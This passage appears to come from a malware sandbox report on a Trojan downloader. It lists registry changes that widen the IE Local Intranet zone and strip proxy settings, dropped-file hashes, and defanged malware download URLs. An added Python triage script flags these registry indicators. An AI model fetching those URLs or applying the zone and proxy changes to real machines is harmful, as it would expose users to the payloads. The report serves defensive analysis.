"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "10"

[HKLM\SOFTWARE\CashReminder]
"instid" = "iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 4C EA 4C 0D D9 83 98 8A 56 49 6F AA CE 7B F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process CashReminder.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 92 EC 81 5A 8C 87 CA F7 BD 7B B4 FF 71 69 1F"

The process sc.exe:3420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 0A 7C 61 2F 5E 1B 7A 40 6F FD A7 72 9C 67 EE"

The process sc.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA DC C5 15 43 95 4F B4 CB 0C 6C BA 0C 50 47"

The process GOSafer.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 0F 1C 07 20 99 82 DF C4 28 6A 2F C7 3F DD"

The process GOSafer.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "15"

[HKLM\SOFTWARE\GOSafer]
"instid" = "DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 E9 53 5B 15 46 BB 33 01 3B 58 18 1A C0 56 16"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process WNet.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\WNet]
"instid" = "ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D ED B9 45 D2 70 88 C1 67 43 28 77 A4 33 D4 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process WNet.exe:256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3B 94 1E FA 7E 1E A7 0E D1 C3 18 5A 1B 24 D6"

The process 310714_is.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A EF 9A 22 6A 05 20 0C 70 D5 52 F7 DD 85 01 85"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 93 74 AB 1E 03 C8 80 36 92 56 66 C3 DE 67 56"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup5755__9664.exe" = "amisetup5755__9664"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones (dotless host names) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are mapped to the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
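
The zone-map and proxy changes above are repeated by nearly every dropped installer (under HKCU for the interactive user and under HKU\.DEFAULT for the service processes), which makes them the most reliable registry indicators in this report. The following Python script is an added example and is not part of the Lavasoft report or of the analysed sample: it parses a listing written in the report's own `[Key]` / `"Name" = "Value"` format (SAMPLE is a constructed excerpt built from a few entries above, with the deleted-value lines folded in), then flags the three Local Intranet zone switches, the ProxyEnable=0 setting together with the deleted proxy values, and any service key that received a load-order Tag. The finding names and the wording of the zone-option descriptions are the example's own.

```python
import re
from collections import defaultdict

# Constructed excerpt in the same format as the listing above (not a full copy).
SAMPLE = r'''
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "10"

[HKLM\SOFTWARE\CashReminder]
"instid" = "iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')              # [HKLM\...]
SET_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')  # "Name" = "Value"
DEL_RE = re.compile(r'^"([^"]+)"$')              # "Name"   (deleted value)

def parse_listing(text):
    """Return {key: {name: value}}; a value of None marks a deleted name."""
    reg = defaultdict(dict)
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        if key is None:
            continue
        m = SET_RE.match(line)
        if m:
            reg[key][m.group(1)] = m.group(2)
            continue
        m = DEL_RE.match(line)
        if m:
            reg[key][m.group(1)] = None
    return dict(reg)

# Effect of each ZoneMap flag when set to 1 (IE "Local intranet" zone options).
ZONEMAP_FLAGS = {
    "IntranetName": "all local (intranet) sites not listed in other zones",
    "UNCAsIntranet": "all network paths (UNCs)",
    "ProxyBypass": "all sites that bypass the proxy server",
}
PROXY_VALUES = ("AutoConfigURL", "ProxyServer", "ProxyOverride")
SERVICE_RE = re.compile(r'^(?:hklm\\)?system\\currentcontrolset\\services\\([^\\]+)$')

def triage(reg):
    """Return a list of (kind, key, detail) findings from a parsed listing."""
    findings = []
    for key, values in reg.items():
        k = key.lower()
        if k.endswith(r'\zonemap'):
            for name, effect in ZONEMAP_FLAGS.items():
                if values.get(name) == "1":
                    findings.append(("ie_zone_widened", key,
                                     f"{name}=1: Local intranet zone now includes {effect}"))
        elif k.endswith(r'\internet settings'):
            if values.get("ProxyEnable") == "0":
                findings.append(("proxy_disabled", key, "ProxyEnable=0"))
            removed = [n for n in PROXY_VALUES if n in values and values[n] is None]
            if removed:
                findings.append(("proxy_config_removed", key, ", ".join(removed)))
        m = SERVICE_RE.match(k)
        if m and "Tag" in values:
            # A new service with a load-order Tag; its ImagePath is the next thing to pull.
            findings.append(("service_registered", key,
                             f"{m.group(1)} given load-order Tag {values['Tag']}; check its ImagePath"))
    return findings

if __name__ == "__main__":
    for kind, key, detail in triage(parse_listing(SAMPLE)):
        print(f"{kind:22} {key}\n{'':22} {detail}")
```

Run it over the full listing in this report (or over a `reg export` of a suspect host converted to the same shape) to get the zone and proxy changes in one place; the same three ZoneMap flags under HKU\.DEFAULT are what the CashReminder, GOSafer and WNet service processes set.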

Dropped PE files

MD5 File path
a5bfd6a87161d5dfa81cb5c2c6d29488 c:\Documents and Settings\"%CurrentUserName%"\Application Data\istartsurf\UninstallManager.exe
a96619564071df84cc892752df062a6d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe
3663b55452d8e814f62d6fae8eb32d65 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe
f94557f8fd41731a3d180383a516fbe3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe
86efd8c3d12bf831f3d2a7e29fe282aa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe
fddf4c9d5bdf47f6638a1405cab91044 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
1b99adddd28023e61c2a23c13cd855cf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe
d61776c4928db339475ab6a773585c9d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe
98c303ebdc2c29766000bc1bbb5e294b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe
a111ca5040df2e52a27baebb40cdf8f1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup5755__9664.exe
bbae2d7dac42f4ff6f172bb9ffe0d589 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp
84bcf3c71e70d5a6e9dc07d70466bdc3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp\nsWeb.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\System.dll
d7a3fa6a6c738b4a3c40d5602af20b08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll
84bcf3c71e70d5a6e9dc07d70466bdc3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\nsWeb.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\registry.dll
d61776c4928db339475ab6a773585c9d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe
763cabe2b93e8a6ca951370ef5133e53 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1]
fddf4c9d5bdf47f6638a1405cab91044 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1]
1b99adddd28023e61c2a23c13cd855cf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe
5dbd356bff7e0a10e80866df96d47a78 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe
7a266046995398d1da3e6c3a98883bd0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1]
98c303ebdc2c29766000bc1bbb5e294b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe
69bd671e58d7b29ea5493a880668a0e1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe
86efd8c3d12bf831f3d2a7e29fe282aa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1]
62f09521fa1665b5dbf4dcc444f4584d c:\Program Files\ActSys\ActSys.exe
50c806e582580511a38980168445a60f c:\Program Files\ActSys\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files\ActSys\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files\ActSys\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files\ActSys\nfregdrv.exe
fb06f6889fe30a3effc5783ca305c59c c:\Program Files\ActSys\remove_ActSys.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files\ActSys\ssleay32.dll
072ce8611b64cad10923f3fae7e52eda c:\Program Files\CashReminder\CashReminder.exe
d68a76ab1ebbbdde37bb12bd68b1639d c:\Program Files\CashReminder\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files\CashReminder\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files\CashReminder\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files\CashReminder\nfregdrv.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files\CashReminder\ssleay32.dll
c7eb85d39abb42efdd7b6c87de25a1dc c:\Program Files\CashReminder\uninstall.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files\GOSafer\ProtocolFilters.dll
c1908176b417b29dcfcfc15d7de9de63 c:\Program Files\GOSafer\gosafer.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files\GOSafer\libeay32.dll
0e2ca4f2d3f113f006d5801319a626de c:\Program Files\GOSafer\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\GOSafer\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\GOSafer\ssleay32.dll
e5dc41a4c742155c1af960fdf5e51ed6 c:\Program Files\GOSafer\uninst.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files\WNet\ProtocolFilters.dll
45571677457a9bfd49aadada0fd91ca8 c:\Program Files\WNet\WNet.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files\WNet\libeay32.dll
8249371485714e1f45a4b1c67002cf47 c:\Program Files\WNet\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\WNet\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\WNet\ssleay32.dll
f5d2e26b10a2b23d534e16a24375b051 c:\Program Files\WNet\uninst.exe
2cf2d758fe1109d055e9857f95a73cf8 c:\WINDOWS\system32\drivers\asfilterdrv.sys
e28c3440574068ccc3948d9ed9f3a047 c:\WINDOWS\system32\drivers\crfilterdrv.sys
649ac45992f39d9a04f3d629a872bd5c c:\WINDOWS\system32\drivers\gosaferdrv.sys
278c3df1efa1e09c4e55e7ddc59ab519 c:\WINDOWS\system32\drivers\ssfilterdrv.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright: q2g54WndLShXYB3BIA5JVf
Legal Trademarks:
Original Filename: q2g54WndLShXYB3BIA5J
Internal Name:
File Version: 7.8.5.9
File Description: Download da Internet
Comments: q2g54WndLShXYB3B
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 188416 3192 3584 2.80742 08b8765ebae57a11c951f075e7900c43

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 184
3e3cd94c5e6d1f1c66683d7bc29aaef7
fd798e8d7d88dc163e681f81144854ea
3330fd55d29f0d1fd88c36931d7e94b6
98dfb01f27d0d00488f3347c7bb0ef36
c6e528a31cafb6b2d33443512b8efc1f
c58fc13ddf9b7a2e8ca99386b9eb6c8f
e4c4cff1094fbff72aeb3e6827f69bc4
7241dc3f2a0b6ea61f4df85d751d7c03
f83816c5fd74f87663c27bc857c54c20
123d3a4485c9649b9f9ee387279725fa
2a2056e64caf8b79177ee628e97db231
641edaabefd4f46a0dc8caa8dae297cd
4363940d7485ca19ff5177e8c83389cc
173ab471842f45ba225c672a966fdfcc
7fe602114a76666ea973a5a22b4bceb7
55f6941611e6b5b5afe7a70dbb1b8bdb
ffe87a74a9ce198b2266dd8fdd67a3a3
5623ca722006ab792b8de36f6d6633ea
415ec116714b68e2101e52ee23129617
3156d35e3cfe3cd058e14cf42ec326eb
aac8203e17f1ba0429eb68f05f00ef5d
a8647af5a88fc0c6cfcf258906f302f4
2bec18f54db5c51eac6e210dba1ff40b
2143cb5872145360aa68b92bd7951843
5e0826607d791fed6050acb832441c67

URLs

URL IP
hxxp://198.50.209.4/registro/icone_cadeado.gif
hxxp://198.50.209.4/registro/top-line.gif
hxxp://www.nowtake.me/8Hk4o
hxxp://www.nowtake.me/010914s/010914i.htm
hxxp://www.nowtake.me/010914s/verificar_ip.php
hxxp://t1.extreme-dm.com/i.gif
hxxp://www.nowtake.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://mobimidia.com/mobile/MobiMidia_validation.js
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://mobimidia.com/mobile/mt-core.js
hxxp://www.nowtake.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
